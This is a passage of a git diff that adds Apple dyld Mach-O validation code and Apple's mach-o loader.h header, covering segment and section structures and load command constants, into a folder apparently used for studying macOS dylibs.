seg1vmEnd) && (seg2vmEnd > info2.vmAddr)) ) { + diag.error("in '%s' segment %s vm range overlaps segment %s", path, info1.segName, 
info2.segName);
+                    badSegments = true;
+                    stop1 = true;
+                    stop2 = true;
+                }
+                if ( ((info2.fileOffset <= info1.fileOffset) && (seg2FileEnd > info1.fileOffset) && (seg1FileEnd > info1.fileOffset)) || ((info2.fileOffset >= info1.fileOffset) && (info2.fileOffset < seg1FileEnd) && (seg2FileEnd > info2.fileOffset )) ) {
+                    if ( !inDyldCache() ) {
+                        // HACK: Split shared caches might put the __TEXT in a SubCache, then the __DATA in a later SubCache.
+                        // The file offsets are in to each SubCache file, which means that they might overlap
+                        // For now we have no choice but to disable this error
+                        diag.error("in '%s' segment %s file content overlaps segment %s", path, info1.segName, info2.segName);
+                        badSegments = true;
+                        stop1 = true;
+                        stop2 = true;
+                    }
+                }
+                if ( (info1.segIndex < info2.segIndex) && !stop1 ) {
+                    if ( (info1.vmAddr > info2.vmAddr) || ((info1.fileOffset > info2.fileOffset ) && (info1.fileOffset != 0) && (info2.fileOffset != 0)) ){
+                        if ( !inDyldCache() && enforceFormat(Malformed::segmentOrder) && !isStaticExecutable() ) {
+                            // whitelist go libraries __DWARF segments
+                            if ( (strcmp(info1.segName, "__DWARF") != 0 && strcmp(info2.segName, "__DWARF") != 0) ) {
+                                // dyld cache __DATA_* segments are moved around
+                                // The static kernel also has segments with vmAddr's before __TEXT
+                                diag.error("in '%s' segment load commands out of order with respect to layout for %s and %s", path, info1.segName, info2.segName);
+                                badSegments = true;
+                                stop1 = true;
+                                stop2 = true;
+                            }
+                        }
+                    }
+                }
+            });
+        });
+    if ( badSegments )
+        return false;
+
+    // check sections are within segment
+    __block bool badSections = false;
+    forEachLoadCommand(diag, ^(const load_command* cmd, bool& stop) {
+        if ( cmd->cmd == LC_SEGMENT_64 ) {
+            const segment_command_64* seg = (segment_command_64*)cmd;
+            const section_64* const sectionsStart = (section_64*)((char*)seg + sizeof(struct segment_command_64));
+            const section_64* const sectionsEnd = &sectionsStart[seg->nsects];
+            for (const section_64* sect=sectionsStart; (sect < sectionsEnd); ++sect) {
+                if ( (int64_t)(sect->size) < 0 ) {
+                    diag.error("in '%s' section '%s' size too large 0x%llX", path, sect->sectname, sect->size);
+                    badSections = true;
+                }
+                else if ( sect->addr < seg->vmaddr ) {
+                    diag.error("in '%s' section '%s' start address 0x%llX is before containing segment's address 0x%0llX", path, sect->sectname, sect->addr, seg->vmaddr);
+                    badSections = true;
+                }
+                else if ( sect->addr+sect->size > seg->vmaddr+seg->vmsize ) {
+                    bool ignoreError = !enforceFormat(Malformed::sectionsAddrRangeWithinSegment);
+#if BUILDING_APP_CACHE_UTIL
+                    if ( (seg->vmsize == 0) && !strcmp(seg->segname, "__CTF") )
+                        ignoreError = true;
+#endif
+                    if ( !ignoreError ) {
+                        diag.error("in '%s' section '%s' end address 0x%llX is beyond containing segment's end address 0x%0llX", path, sect->sectname, sect->addr+sect->size, seg->vmaddr+seg->vmsize);
+                        badSections = true;
+                    }
+                }
+            }
+        }
+        else if ( cmd->cmd == LC_SEGMENT ) {
+            const segment_command* seg = (segment_command*)cmd;
+            const section* const sectionsStart = (section*)((char*)seg + sizeof(struct segment_command));
+            const section* const sectionsEnd = &sectionsStart[seg->nsects];
+            for (const section* sect=sectionsStart; !stop && (sect < sectionsEnd); ++sect) {
+                if ( (int64_t)(sect->size) < 0 ) {
+                    diag.error("in '%s' section %s size too large 0x%X", path, sect->sectname, sect->size);
+                    badSections = true;
+                }
+                else if ( sect->addr < seg->vmaddr ) {
+                    diag.error("in '%s' section %s start address 0x%X is before containing segment's address 0x%0X", path, sect->sectname, sect->addr, seg->vmaddr);
+                    badSections = true;
+                }
+                else if ( sect->addr+sect->size > seg->vmaddr+seg->vmsize ) {
+                    diag.error("in '%s' section %s end address 0x%X is beyond containing segment's end address 0x%0X", path, sect->sectname, sect->addr+sect->size, seg->vmaddr+seg->vmsize);
+                    badSections = true;
+                }
+            }
+        }
+    });
+
+    return !badSections;
+}
+
+void MachOFile::forEachSingletonPatch(Diagnostics& diag,
void (^handler)(SingletonPatchKind kind,
+                                      uint64_t runtimeOffset)) const
+{
+    uint32_t ptrSize = this->pointerSize();
+    uint32_t elementSize = (2 * ptrSize);
+    uint64_t loadAddress = this->preferredLoadAddress();
+    this->forEachSection(^(const SectionInfo &sectInfo, bool malformedSectionRange, bool &stop) {
+        if ( strcmp(sectInfo.sectName, "__const_cfobj2") != 0 )
+            return;
+        stop = true;
+
+        if ( (sectInfo.sectSize % elementSize) != 0 ) {
+            diag.error("Incorrect patching size (%lld). Should be a multiple of (2 * ptrSize)", sectInfo.sectSize);
+            return;
+        }
+
+        if ( sectInfo.reserved2 != elementSize ) {
+            // ld64 must have rejected one or more of the elements in the section, so
+            // didn't set the reserved2 to let us patch
+            diag.error("reserved2 is unsupported value %d. Expected %d",
+                       sectInfo.reserved2, elementSize);
+            return;
+        }
+
+        for ( uint64_t offset = 0; offset != sectInfo.sectSize; offset += elementSize ) {
+            uint64_t targetRuntimeOffset = (sectInfo.sectAddr + offset) - loadAddress;
+            handler(SingletonPatchKind::cfObj2, targetRuntimeOffset);
+        }
+    });
+}
+
+
+} // namespace dyld3
diff --git a/IV. Dylibs/macos/loader.h b/IV. Dylibs/macos/loader.h
new file mode 100644
index 0000000..bf156dc
--- /dev/null
+++ b/IV. Dylibs/macos/loader.h
@@ -0,0 +1,1590 @@
+// Source: https://github.com/apple-oss-distributions/xnu/blob/rel/xnu-10002/EXTERNAL_HEADERS/mach-o/loader.h
+/*
+ * Copyright (c) 1999-2019 Apple Inc. All Rights Reserved.
+ * @APPLE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this
+ * file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_LICENSE_HEADER_END@
+ */
+#ifndef _MACHO_LOADER_H_
+#define _MACHO_LOADER_H_
+
+/*
+ * This file describes the format of mach object files.
+ */
+#include <stdint.h>
+
+/*
+ * <mach/machine.h> is needed here for the cpu_type_t and cpu_subtype_t types
+ * and contains the constants for the possible values of these types.
+ */
+#include <mach/machine.h>
+
+/*
+ * <mach/vm_prot.h> is needed here for the vm_prot_t type and contains the
+ * constants that are or'ed together for the possible values of this type.
+ */
+#include <mach/vm_prot.h>
+
+/*
+ * <machine/thread_status.h> is expected to define the flavors of the thread
+ * states and the structures of those flavors for each machine.
+ */
+#include <mach/machine/thread_status.h>
+#include <architecture/byte_order.h>
+
+/*
+ * The 32-bit mach header appears at the very beginning of the object file for
+ * 32-bit architectures.
+ */
+struct mach_header {
+	uint32_t	magic;		/* mach magic number identifier */
+	cpu_type_t	cputype;	/* cpu specifier */
+	cpu_subtype_t	cpusubtype;	/* machine specifier */
+	uint32_t	filetype;	/* type of file */
+	uint32_t	ncmds;		/* number of load commands */
+	uint32_t	sizeofcmds;	/* the size of all the load commands */
+	uint32_t	flags;		/* flags */
+};
+
+/* Constant for the magic field of the mach_header (32-bit architectures) */
+#define	MH_MAGIC	0xfeedface	/* the mach magic number */
+#define MH_CIGAM	0xcefaedfe	/* NXSwapInt(MH_MAGIC) */
+
+/*
+ * The 64-bit mach header appears at the very beginning of object files for
+ * 64-bit architectures.
+ */ +struct mach_header_64 { + uint32_t magic; /* mach magic number identifier */ + cpu_type_t cputype; /* cpu specifier */ + cpu_subtype_t cpusubtype; /* machine specifier */ + uint32_t filetype; /* type of file */ + uint32_t ncmds; /* number of load commands */ + uint32_t sizeofcmds; /* the size of all the load commands */ + uint32_t flags; /* flags */ + uint32_t reserved; /* reserved */ +}; + +/* Constant for the magic field of the mach_header_64 (64-bit architectures) */ +#define MH_MAGIC_64 0xfeedfacf /* the 64-bit mach magic number */ +#define MH_CIGAM_64 0xcffaedfe /* NXSwapInt(MH_MAGIC_64) */ + +/* + * The layout of the file depends on the filetype. For all but the MH_OBJECT + * file type the segments are padded out and aligned on a segment alignment + * boundary for efficient demand pageing. The MH_EXECUTE, MH_FVMLIB, MH_DYLIB, + * MH_DYLINKER and MH_BUNDLE file types also have the headers included as part + * of their first segment. + * + * The file type MH_OBJECT is a compact format intended as output of the + * assembler and input (and possibly output) of the link editor (the .o + * format). All sections are in one unnamed segment with no segment padding. + * This format is used as an executable format when the file is so small the + * segment padding greatly increases its size. + * + * The file type MH_PRELOAD is an executable format intended for things that + * are not executed under the kernel (proms, stand alones, kernels, etc). The + * format can be executed under the kernel but may demand paged it and not + * preload it before execution. + * + * A core file is in MH_CORE format and can be any in an arbritray legal + * Mach-O file. 
+ * + * Constants for the filetype field of the mach_header + */ +#define MH_OBJECT 0x1 /* relocatable object file */ +#define MH_EXECUTE 0x2 /* demand paged executable file */ +#define MH_FVMLIB 0x3 /* fixed VM shared library file */ +#define MH_CORE 0x4 /* core file */ +#define MH_PRELOAD 0x5 /* preloaded executable file */ +#define MH_DYLIB 0x6 /* dynamically bound shared library */ +#define MH_DYLINKER 0x7 /* dynamic link editor */ +#define MH_BUNDLE 0x8 /* dynamically bound bundle file */ +#define MH_DYLIB_STUB 0x9 /* shared library stub for static */ + /* linking only, no section contents */ +#define MH_DSYM 0xa /* companion file with only debug */ + /* sections */ +#define MH_KEXT_BUNDLE 0xb /* x86_64 kexts */ +#define MH_FILESET 0xc /* set of mach-o's */ + +/* Constants for the flags field of the mach_header */ +#define MH_NOUNDEFS 0x1 /* the object file has no undefined + references */ +#define MH_INCRLINK 0x2 /* the object file is the output of an + incremental link against a base file + and can't be link edited again */ +#define MH_DYLDLINK 0x4 /* the object file is input for the + dynamic linker and can't be staticly + link edited again */ +#define MH_BINDATLOAD 0x8 /* the object file's undefined + references are bound by the dynamic + linker when loaded. */ +#define MH_PREBOUND 0x10 /* the file has its dynamic undefined + references prebound. */ +#define MH_SPLIT_SEGS 0x20 /* the file has its read-only and + read-write segments split */ +#define MH_LAZY_INIT 0x40 /* the shared library init routine is + to be run lazily via catching memory + faults to its writeable segments + (obsolete) */ +#define MH_TWOLEVEL 0x80 /* the image is using two-level name + space bindings */ +#define MH_FORCE_FLAT 0x100 /* the executable is forcing all images + to use flat name space bindings */ +#define MH_NOMULTIDEFS 0x200 /* this umbrella guarantees no multiple + defintions of symbols in its + sub-images so the two-level namespace + hints can always be used. 
*/ +#define MH_NOFIXPREBINDING 0x400 /* do not have dyld notify the + prebinding agent about this + executable */ +#define MH_PREBINDABLE 0x800 /* the binary is not prebound but can + have its prebinding redone. only used + when MH_PREBOUND is not set. */ +#define MH_ALLMODSBOUND 0x1000 /* indicates that this binary binds to + all two-level namespace modules of + its dependent libraries. only used + when MH_PREBINDABLE and MH_TWOLEVEL + are both set. */ +#define MH_SUBSECTIONS_VIA_SYMBOLS 0x2000/* safe to divide up the sections into + sub-sections via symbols for dead + code stripping */ +#define MH_CANONICAL 0x4000 /* the binary has been canonicalized + via the unprebind operation */ +#define MH_WEAK_DEFINES 0x8000 /* the final linked image contains + external weak symbols */ +#define MH_BINDS_TO_WEAK 0x10000 /* the final linked image uses + weak symbols */ + +#define MH_ALLOW_STACK_EXECUTION 0x20000/* When this bit is set, all stacks + in the task will be given stack + execution privilege. Only used in + MH_EXECUTE filetypes. */ +#define MH_ROOT_SAFE 0x40000 /* When this bit is set, the binary + declares it is safe for use in + processes with uid zero */ + +#define MH_SETUID_SAFE 0x80000 /* When this bit is set, the binary + declares it is safe for use in + processes when issetugid() is true */ + +#define MH_NO_REEXPORTED_DYLIBS 0x100000 /* When this bit is set on a dylib, + the static linker does not need to + examine dependent dylibs to see + if any are re-exported */ +#define MH_PIE 0x200000 /* When this bit is set, the OS will + load the main executable at a + random address. Only used in + MH_EXECUTE filetypes. */ +#define MH_DEAD_STRIPPABLE_DYLIB 0x400000 /* Only for use on dylibs. When + linking against a dylib that + has this bit set, the static linker + will automatically not create a + LC_LOAD_DYLIB load command to the + dylib if no symbols are being + referenced from the dylib. 
*/ +#define MH_HAS_TLV_DESCRIPTORS 0x800000 /* Contains a section of type + S_THREAD_LOCAL_VARIABLES */ + +#define MH_NO_HEAP_EXECUTION 0x1000000 /* When this bit is set, the OS will + run the main executable with + a non-executable heap even on + platforms (e.g. i386) that don't + require it. Only used in MH_EXECUTE + filetypes. */ + +#define MH_APP_EXTENSION_SAFE 0x02000000 /* The code was linked for use in an + application extension. */ + +#define MH_NLIST_OUTOFSYNC_WITH_DYLDINFO 0x04000000 /* The external symbols + listed in the nlist symbol table do + not include all the symbols listed in + the dyld info. */ + +#define MH_SIM_SUPPORT 0x08000000 /* Allow LC_MIN_VERSION_MACOS and + LC_BUILD_VERSION load commands with + the platforms macOS, iOSMac, + iOSSimulator, tvOSSimulator and + watchOSSimulator. */ + +#define MH_DYLIB_IN_CACHE 0x80000000 /* Only for use on dylibs. When this bit + is set, the dylib is part of the dyld + shared cache, rather than loose in + the filesystem. */ + +/* + * The load commands directly follow the mach_header. The total size of all + * of the commands is given by the sizeofcmds field in the mach_header. All + * load commands must have as their first two fields cmd and cmdsize. The cmd + * field is filled in with a constant for that command type. Each command type + * has a structure specifically for it. The cmdsize field is the size in bytes + * of the particular load command structure plus anything that follows it that + * is a part of the load command (i.e. section structures, strings, etc.). To + * advance to the next load command the cmdsize can be added to the offset or + * pointer of the current load command. The cmdsize for 32-bit architectures + * MUST be a multiple of 4 bytes and for 64-bit architectures MUST be a multiple + * of 8 bytes (these are forever the maximum alignment of any load commands). + * The padded bytes must be zero. 
All tables in the object file must also + * follow these rules so the file can be memory mapped. Otherwise the pointers + * to these tables will not work well or at all on some machines. With all + * padding zeroed like objects will compare byte for byte. + */ +struct load_command { + uint32_t cmd; /* type of load command */ + uint32_t cmdsize; /* total size of command in bytes */ +}; + +/* + * After MacOS X 10.1 when a new load command is added that is required to be + * understood by the dynamic linker for the image to execute properly the + * LC_REQ_DYLD bit will be or'ed into the load command constant. If the dynamic + * linker sees such a load command it it does not understand will issue a + * "unknown load command required for execution" error and refuse to use the + * image. Other load commands without this bit that are not understood will + * simply be ignored. + */ +#define LC_REQ_DYLD 0x80000000 + +/* Constants for the cmd field of all load commands, the type */ +#define LC_SEGMENT 0x1 /* segment of this file to be mapped */ +#define LC_SYMTAB 0x2 /* link-edit stab symbol table info */ +#define LC_SYMSEG 0x3 /* link-edit gdb symbol table info (obsolete) */ +#define LC_THREAD 0x4 /* thread */ +#define LC_UNIXTHREAD 0x5 /* unix thread (includes a stack) */ +#define LC_LOADFVMLIB 0x6 /* load a specified fixed VM shared library */ +#define LC_IDFVMLIB 0x7 /* fixed VM shared library identification */ +#define LC_IDENT 0x8 /* object identification info (obsolete) */ +#define LC_FVMFILE 0x9 /* fixed VM file inclusion (internal use) */ +#define LC_PREPAGE 0xa /* prepage command (internal use) */ +#define LC_DYSYMTAB 0xb /* dynamic link-edit symbol table info */ +#define LC_LOAD_DYLIB 0xc /* load a dynamically linked shared library */ +#define LC_ID_DYLIB 0xd /* dynamically linked shared lib ident */ +#define LC_LOAD_DYLINKER 0xe /* load a dynamic linker */ +#define LC_ID_DYLINKER 0xf /* dynamic linker identification */ +#define LC_PREBOUND_DYLIB 0x10 /* modules 
prebound for a dynamically */ + /* linked shared library */ +#define LC_ROUTINES 0x11 /* image routines */ +#define LC_SUB_FRAMEWORK 0x12 /* sub framework */ +#define LC_SUB_UMBRELLA 0x13 /* sub umbrella */ +#define LC_SUB_CLIENT 0x14 /* sub client */ +#define LC_SUB_LIBRARY 0x15 /* sub library */ +#define LC_TWOLEVEL_HINTS 0x16 /* two-level namespace lookup hints */ +#define LC_PREBIND_CKSUM 0x17 /* prebind checksum */ + +/* + * load a dynamically linked shared library that is allowed to be missing + * (all symbols are weak imported). + */ +#define LC_LOAD_WEAK_DYLIB (0x18 | LC_REQ_DYLD) + +#define LC_SEGMENT_64 0x19 /* 64-bit segment of this file to be + mapped */ +#define LC_ROUTINES_64 0x1a /* 64-bit image routines */ +#define LC_UUID 0x1b /* the uuid */ +#define LC_RPATH (0x1c | LC_REQ_DYLD) /* runpath additions */ +#define LC_CODE_SIGNATURE 0x1d /* local of code signature */ +#define LC_SEGMENT_SPLIT_INFO 0x1e /* local of info to split segments */ +#define LC_REEXPORT_DYLIB (0x1f | LC_REQ_DYLD) /* load and re-export dylib */ +#define LC_LAZY_LOAD_DYLIB 0x20 /* delay load of dylib until first use */ +#define LC_ENCRYPTION_INFO 0x21 /* encrypted segment information */ +#define LC_DYLD_INFO 0x22 /* compressed dyld information */ +#define LC_DYLD_INFO_ONLY (0x22|LC_REQ_DYLD) /* compressed dyld information only */ +#define LC_LOAD_UPWARD_DYLIB (0x23 | LC_REQ_DYLD) /* load upward dylib */ +#define LC_VERSION_MIN_MACOSX 0x24 /* build for MacOSX min OS version */ +#define LC_VERSION_MIN_IPHONEOS 0x25 /* build for iPhoneOS min OS version */ +#define LC_FUNCTION_STARTS 0x26 /* compressed table of function start addresses */ +#define LC_DYLD_ENVIRONMENT 0x27 /* string for dyld to treat + like environment variable */ +#define LC_MAIN (0x28|LC_REQ_DYLD) /* replacement for LC_UNIXTHREAD */ +#define LC_DATA_IN_CODE 0x29 /* table of non-instructions in __text */ +#define LC_SOURCE_VERSION 0x2A /* source version used to build binary */ +#define LC_DYLIB_CODE_SIGN_DRS 0x2B /* 
Code signing DRs copied from linked dylibs */ +#define LC_ENCRYPTION_INFO_64 0x2C /* 64-bit encrypted segment information */ +#define LC_LINKER_OPTION 0x2D /* linker options in MH_OBJECT files */ +#define LC_LINKER_OPTIMIZATION_HINT 0x2E /* optimization hints in MH_OBJECT files */ +#define LC_VERSION_MIN_TVOS 0x2F /* build for AppleTV min OS version */ +#define LC_VERSION_MIN_WATCHOS 0x30 /* build for Watch min OS version */ +#define LC_NOTE 0x31 /* arbitrary data included within a Mach-O file */ +#define LC_BUILD_VERSION 0x32 /* build for platform min OS version */ +#define LC_DYLD_EXPORTS_TRIE (0x33 | LC_REQ_DYLD) /* used with linkedit_data_command, payload is trie */ +#define LC_DYLD_CHAINED_FIXUPS (0x34 | LC_REQ_DYLD) /* used with linkedit_data_command */ +#define LC_FILESET_ENTRY (0x35 | LC_REQ_DYLD) /* used with fileset_entry_command */ + +/* + * A variable length string in a load command is represented by an lc_str + * union. The strings are stored just after the load command structure and + * the offset is from the start of the load command structure. The size + * of the string is reflected in the cmdsize field of the load command. + * Once again any padded bytes to bring the cmdsize field to a multiple + * of 4 bytes must be zero. + */ +union lc_str { + uint32_t offset; /* offset to the string */ +#ifndef __LP64__ + char *ptr; /* pointer to the string */ +#endif +}; + +/* + * The segment load command indicates that a part of this file is to be + * mapped into the task's address space. The size of this segment in memory, + * vmsize, maybe equal to or larger than the amount to map from this file, + * filesize. The file is mapped starting at fileoff to the beginning of + * the segment in memory, vmaddr. The rest of the memory of the segment, + * if any, is allocated zero fill on demand. The segment's maximum virtual + * memory protection and initial virtual memory protection are specified + * by the maxprot and initprot fields. 
If the segment has sections then the + * section structures directly follow the segment command and their size is + * reflected in cmdsize. + */ +struct segment_command { /* for 32-bit architectures */ + uint32_t cmd; /* LC_SEGMENT */ + uint32_t cmdsize; /* includes sizeof section structs */ + char segname[16]; /* segment name */ + uint32_t vmaddr; /* memory address of this segment */ + uint32_t vmsize; /* memory size of this segment */ + uint32_t fileoff; /* file offset of this segment */ + uint32_t filesize; /* amount to map from the file */ + vm_prot_t maxprot; /* maximum VM protection */ + vm_prot_t initprot; /* initial VM protection */ + uint32_t nsects; /* number of sections in segment */ + uint32_t flags; /* flags */ +}; + +/* + * The 64-bit segment load command indicates that a part of this file is to be + * mapped into a 64-bit task's address space. If the 64-bit segment has + * sections then section_64 structures directly follow the 64-bit segment + * command and their size is reflected in cmdsize. 
+ */ +struct segment_command_64 { /* for 64-bit architectures */ + uint32_t cmd; /* LC_SEGMENT_64 */ + uint32_t cmdsize; /* includes sizeof section_64 structs */ + char segname[16]; /* segment name */ + uint64_t vmaddr; /* memory address of this segment */ + uint64_t vmsize; /* memory size of this segment */ + uint64_t fileoff; /* file offset of this segment */ + uint64_t filesize; /* amount to map from the file */ + vm_prot_t maxprot; /* maximum VM protection */ + vm_prot_t initprot; /* initial VM protection */ + uint32_t nsects; /* number of sections in segment */ + uint32_t flags; /* flags */ +}; + +/* Constants for the flags field of the segment_command */ +#define SG_HIGHVM 0x1 /* the file contents for this segment is for + the high part of the VM space, the low part + is zero filled (for stacks in core files) */ +#define SG_FVMLIB 0x2 /* this segment is the VM that is allocated by + a fixed VM library, for overlap checking in + the link editor */ +#define SG_NORELOC 0x4 /* this segment has nothing that was relocated + in it and nothing relocated to it, that is + it maybe safely replaced without relocation*/ +#define SG_PROTECTED_VERSION_1 0x8 /* This segment is protected. If the + segment starts at file offset 0, the + first page of the segment is not + protected. All other pages of the + segment are protected. */ +#define SG_READ_ONLY 0x10 /* This segment is made read-only after fixups */ + + + +/* + * A segment is made up of zero or more sections. Non-MH_OBJECT files have + * all of their segments with the proper sections in each, and padded to the + * specified segment alignment when produced by the link editor. The first + * segment of a MH_EXECUTE and MH_FVMLIB format file contains the mach_header + * and load commands of the object file before its first section. The zero + * fill sections are always last in their segment (in all formats). This + * allows the zeroed segment padding to be mapped into memory where zero fill + * sections might be. 
The gigabyte zero fill sections, those with the section + * type S_GB_ZEROFILL, can only be in a segment with sections of this type. + * These segments are then placed after all other segments. + * + * The MH_OBJECT format has all of its sections in one segment for + * compactness. There is no padding to a specified segment boundary and the + * mach_header and load commands are not part of the segment. + * + * Sections with the same section name, sectname, going into the same segment, + * segname, are combined by the link editor. The resulting section is aligned + * to the maximum alignment of the combined sections and is the new section's + * alignment. The combined sections are aligned to their original alignment in + * the combined section. Any padded bytes to get the specified alignment are + * zeroed. + * + * The format of the relocation entries referenced by the reloff and nreloc + * fields of the section structure for mach object files is described in the + * header file . + */ +struct section { /* for 32-bit architectures */ + char sectname[16]; /* name of this section */ + char segname[16]; /* segment this section goes in */ + uint32_t addr; /* memory address of this section */ + uint32_t size; /* size in bytes of this section */ + uint32_t offset; /* file offset of this section */ + uint32_t align; /* section alignment (power of 2) */ + uint32_t reloff; /* file offset of relocation entries */ + uint32_t nreloc; /* number of relocation entries */ + uint32_t flags; /* flags (section type and attributes)*/ + uint32_t reserved1; /* reserved (for offset or index) */ + uint32_t reserved2; /* reserved (for count or sizeof) */ +}; + +struct section_64 { /* for 64-bit architectures */ + char sectname[16]; /* name of this section */ + char segname[16]; /* segment this section goes in */ + uint64_t addr; /* memory address of this section */ + uint64_t size; /* size in bytes of this section */ + uint32_t offset; /* file offset of this section */ + uint32_t align; /* 
section alignment (power of 2) */ + uint32_t reloff; /* file offset of relocation entries */ + uint32_t nreloc; /* number of relocation entries */ + uint32_t flags; /* flags (section type and attributes)*/ + uint32_t reserved1; /* reserved (for offset or index) */ + uint32_t reserved2; /* reserved (for count or sizeof) */ + uint32_t reserved3; /* reserved */ +}; + +/* + * The flags field of a section structure is separated into two parts a section + * type and section attributes. The section types are mutually exclusive (it + * can only have one type) but the section attributes are not (it may have more + * than one attribute). + */ +#define SECTION_TYPE 0x000000ff /* 256 section types */ +#define SECTION_ATTRIBUTES 0xffffff00 /* 24 section attributes */ + +/* Constants for the type of a section */ +#define S_REGULAR 0x0 /* regular section */ +#define S_ZEROFILL 0x1 /* zero fill on demand section */ +#define S_CSTRING_LITERALS 0x2 /* section with only literal C strings*/ +#define S_4BYTE_LITERALS 0x3 /* section with only 4 byte literals */ +#define S_8BYTE_LITERALS 0x4 /* section with only 8 byte literals */ +#define S_LITERAL_POINTERS 0x5 /* section with only pointers to */ + /* literals */ +/* + * For the two types of symbol pointers sections and the symbol stubs section + * they have indirect symbol table entries. For each of the entries in the + * section the indirect symbol table entries, in corresponding order in the + * indirect symbol table, start at the index stored in the reserved1 field + * of the section structure. Since the indirect symbol table entries + * correspond to the entries in the section the number of indirect symbol table + * entries is inferred from the size of the section divided by the size of the + * entries in the section. For symbol pointers sections the size of the entries + * in the section is 4 bytes and for symbol stubs sections the byte size of the + * stubs is stored in the reserved2 field of the section structure. 
+ */ +#define S_NON_LAZY_SYMBOL_POINTERS 0x6 /* section with only non-lazy + symbol pointers */ +#define S_LAZY_SYMBOL_POINTERS 0x7 /* section with only lazy symbol + pointers */ +#define S_SYMBOL_STUBS 0x8 /* section with only symbol + stubs, byte size of stub in + the reserved2 field */ +#define S_MOD_INIT_FUNC_POINTERS 0x9 /* section with only function + pointers for initialization*/ +#define S_MOD_TERM_FUNC_POINTERS 0xa /* section with only function + pointers for termination */ +#define S_COALESCED 0xb /* section contains symbols that + are to be coalesced */ +#define S_GB_ZEROFILL 0xc /* zero fill on demand section + (that can be larger than 4 + gigabytes) */ +#define S_INTERPOSING 0xd /* section with only pairs of + function pointers for + interposing */ +#define S_16BYTE_LITERALS 0xe /* section with only 16 byte + literals */ +#define S_DTRACE_DOF 0xf /* section contains + DTrace Object Format */ +#define S_LAZY_DYLIB_SYMBOL_POINTERS 0x10 /* section with only lazy + symbol pointers to lazy + loaded dylibs */ +/* + * Section types to support thread local variables + */ +#define S_THREAD_LOCAL_REGULAR 0x11 /* template of initial + values for TLVs */ +#define S_THREAD_LOCAL_ZEROFILL 0x12 /* template of initial + values for TLVs */ +#define S_THREAD_LOCAL_VARIABLES 0x13 /* TLV descriptors */ +#define S_THREAD_LOCAL_VARIABLE_POINTERS 0x14 /* pointers to TLV + descriptors */ +#define S_THREAD_LOCAL_INIT_FUNCTION_POINTERS 0x15 /* functions to call + to initialize TLV + values */ +#define S_INIT_FUNC_OFFSETS 0x16 /* 32-bit offsets to + initializers */ + +/* + * Constants for the section attributes part of the flags field of a section + * structure. 
+ */ +#define SECTION_ATTRIBUTES_USR 0xff000000 /* User setable attributes */ +#define S_ATTR_PURE_INSTRUCTIONS 0x80000000 /* section contains only true + machine instructions */ +#define S_ATTR_NO_TOC 0x40000000 /* section contains coalesced + symbols that are not to be + in a ranlib table of + contents */ +#define S_ATTR_STRIP_STATIC_SYMS 0x20000000 /* ok to strip static symbols + in this section in files + with the MH_DYLDLINK flag */ +#define S_ATTR_NO_DEAD_STRIP 0x10000000 /* no dead stripping */ +#define S_ATTR_LIVE_SUPPORT 0x08000000 /* blocks are live if they + reference live blocks */ +#define S_ATTR_SELF_MODIFYING_CODE 0x04000000 /* Used with i386 code stubs + written on by dyld */ +/* + * If a segment contains any sections marked with S_ATTR_DEBUG then all + * sections in that segment must have this attribute. No section other than + * a section marked with this attribute may reference the contents of this + * section. A section with this attribute may contain no symbols and must have + * a section type S_REGULAR. The static linker will not copy section contents + * from sections with this attribute into its output file. These sections + * generally contain DWARF debugging info. + */ +#define S_ATTR_DEBUG 0x02000000 /* a debug section */ +#define SECTION_ATTRIBUTES_SYS 0x00ffff00 /* system setable attributes */ +#define S_ATTR_SOME_INSTRUCTIONS 0x00000400 /* section contains some + machine instructions */ +#define S_ATTR_EXT_RELOC 0x00000200 /* section has external + relocation entries */ +#define S_ATTR_LOC_RELOC 0x00000100 /* section has local + relocation entries */ + + +/* + * The names of segments and sections in them are mostly meaningless to the + * link-editor. But there are few things to support traditional UNIX + * executables that require the link-editor and assembler to use some names + * agreed upon by convention. + * + * The initial protection of the "__TEXT" segment has write protection turned + * off (not writeable). 
+ * + * The link-editor will allocate common symbols at the end of the "__common" + * section in the "__DATA" segment. It will create the section and segment + * if needed. + */ + +/* The currently known segment names and the section names in those segments */ + +#define SEG_PAGEZERO "__PAGEZERO" /* the pagezero segment which has no */ + /* protections and catches NULL */ + /* references for MH_EXECUTE files */ + + +#define SEG_TEXT "__TEXT" /* the tradition UNIX text segment */ +#define SECT_TEXT "__text" /* the real text part of the text */ + /* section no headers, and no padding */ +#define SECT_FVMLIB_INIT0 "__fvmlib_init0" /* the fvmlib initialization */ + /* section */ +#define SECT_FVMLIB_INIT1 "__fvmlib_init1" /* the section following the */ + /* fvmlib initialization */ + /* section */ + +#define SEG_DATA "__DATA" /* the tradition UNIX data segment */ +#define SECT_DATA "__data" /* the real initialized data section */ + /* no padding, no bss overlap */ +#define SECT_BSS "__bss" /* the real uninitialized data section*/ + /* no padding */ +#define SECT_COMMON "__common" /* the section common symbols are */ + /* allocated in by the link editor */ + +#define SEG_OBJC "__OBJC" /* objective-C runtime segment */ +#define SECT_OBJC_SYMBOLS "__symbol_table" /* symbol table */ +#define SECT_OBJC_MODULES "__module_info" /* module information */ +#define SECT_OBJC_STRINGS "__selector_strs" /* string table */ +#define SECT_OBJC_REFS "__selector_refs" /* string table */ + +#define SEG_ICON "__ICON" /* the icon segment */ +#define SECT_ICON_HEADER "__header" /* the icon headers */ +#define SECT_ICON_TIFF "__tiff" /* the icons in tiff format */ + +#define SEG_LINKEDIT "__LINKEDIT" /* the segment containing all structs */ + /* created and maintained by the link */ + /* editor. 
